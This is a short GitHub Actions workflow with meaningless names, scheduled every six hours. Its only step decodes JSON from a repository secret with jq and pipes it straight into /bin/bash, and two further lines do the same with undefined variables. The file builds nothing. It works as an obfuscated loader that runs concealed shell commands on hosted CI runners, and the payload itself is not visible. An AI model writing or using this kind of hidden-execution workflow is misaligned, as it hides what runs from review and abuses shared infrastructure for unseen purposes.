name: wrackricotta
on:
  workflow_dispatch:
  schedule:
    - cron: '2 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wrackricotta
        env:
          d43987: ${{ secrets.d43987 }}
        run: |
          echo $d43987 | jq -r .aiska525 | /bin/bash
          echo $csb0 | jq -r .zsvvi242 | /bin/bash
          echo $m03 | jq -r .abxcj97696 | /bin/bash

